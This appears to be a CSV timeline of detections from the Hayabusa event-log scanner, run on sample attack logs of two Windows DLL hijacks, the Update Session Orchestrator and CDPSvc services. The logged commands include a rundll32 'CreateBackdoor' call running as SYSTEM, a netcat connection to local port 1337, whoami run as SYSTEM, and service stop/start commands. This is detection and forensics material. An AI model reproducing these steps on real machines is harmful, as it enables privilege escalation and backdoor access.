2020-03-21 14:00:25.224 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 2536 | PGUID: 747F3D96-9F69-5E75-0000-00106F6A2000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.230 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1828 | PGUID: 747F3D96-9F69-5E75-0000-0010946B2000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.232 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.234 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 7836 | PGUID: 747F3D96-9F69-5E75-0000-0010476F2000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.242 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 7836 | PGUID: 747F3D96-9F69-5E75-0000-0010476F2000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.247 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.250 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 6400 | PGUID: 747F3D96-9F69-5E75-0000-0010DE732000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.255 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 6400 | PGUID: 747F3D96-9F69-5E75-0000-0010DE732000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.388 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.392 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 8160 | PGUID: 747F3D96-9F69-5E75-0000-001055912000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.401 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.421 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 6572 | PGUID: 747F3D96-9F69-5E75-0000-001033922000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.425 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 8160 | PGUID: 747F3D96-9F69-5E75-0000-001055912000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.434 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 6572 | PGUID: 747F3D96-9F69-5E75-0000-001033922000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.440 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.443 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 6136 | PGUID: 747F3D96-9F69-5E75-0000-00102F962000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.451 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.459 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 1388 | PGUID: 747F3D96-9F69-5E75-0000-001035972000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.463 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 6136 | PGUID: 747F3D96-9F69-5E75-0000-00102F962000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.485 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1388 | PGUID: 747F3D96-9F69-5E75-0000-001035972000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.486 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.499 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 2028 | PGUID: 747F3D96-9F69-5E75-0000-00105B9A2000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.513 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 2028 | PGUID: 747F3D96-9F69-5E75-0000-00105B9A2000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.542 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.548 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 3536 | PGUID: 747F3D96-9F69-5E75-0000-0010729F2000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:25.569 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3536 | PGUID: 747F3D96-9F69-5E75-0000-0010729F2000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:39.226 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: nc.exe 127.0.0.1 1337 | Process: C:\Users\Public\Tools\nc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2935f | PID: 3364 | PGUID: 747F3D96-9F77-5E75-0000-0010D2E62000 | Hash: SHA1=08664F5C3E07862AB9B531848AC92D08C8C6BA5A,MD5=E0DB1D3D47E312EF62E5B0C74DCEAFE5,SHA256=B3B207DFAB2F429CC352BA125BE32A0CAE69FE4BF8563AB7D0128BBA8C57A71C,IMPHASH=98CE7B6533CBD67993E36DAFB4E95946",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:39.226 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:39.441 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | LID: 0x3e7 | PID: 2416 | PGUID: 747F3D96-9F77-5E75-0000-001090F32000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:40.502 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49674 (MSEDGEWIN10) | Dst: 127.0.0.1:1337 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\rundll32.exe | PID: 4848 | PGUID: 747F3D96-9F61-5E75-0000-0010686A1E00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x3e7 | PID: 2484 | PGUID: 747F3D96-9F7D-5E75-0000-00104E062100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 14:00:54.689 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 4680 | PGUID: 747F3D96-9F86-5E75-0000-00101A9F2100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7  Update Session Orchestrator Dll Hijack.evtx
2020-03-21 21:35:35.026 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc stop CDPSvc | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2de43 | PID: 4876 | PGUID: 747F3D96-0A17-5E76-0000-001062373A00 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:35:35.026 +09:00,MSEDGEWIN10,1,low,Impact,Stop Windows Service,,rules/sigma/process_creation/proc_creation_win_service_stop.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:35:43.104 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc query CDPSvc | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2de43 | PID: 1236 | PGUID: 747F3D96-0A1F-5E76-0000-0010375C3A00 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:35:52.013 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe"" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications | Process: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\System32\RuntimeBroker.exe -Embedding | LID: 0x2de87 | PID: 3808 | PGUID: 747F3D96-0A28-5E76-0000-0010882B3C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: net start CDPSvc | Process: C:\Windows\System32\net.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2de43 | PID: 7072 | PGUID: 747F3D96-0A2B-5E76-0000-0010C02A3D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,low,Exec,Service Execution,,rules/sigma/process_creation/proc_creation_win_service_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\net1 start CDPSvc | Process: C:\Windows\System32\net1.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: net start CDPSvc | LID: 0x2de43 | PID: 7664 | PGUID: 747F3D96-0A2B-5E76-0000-0010A92C3D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
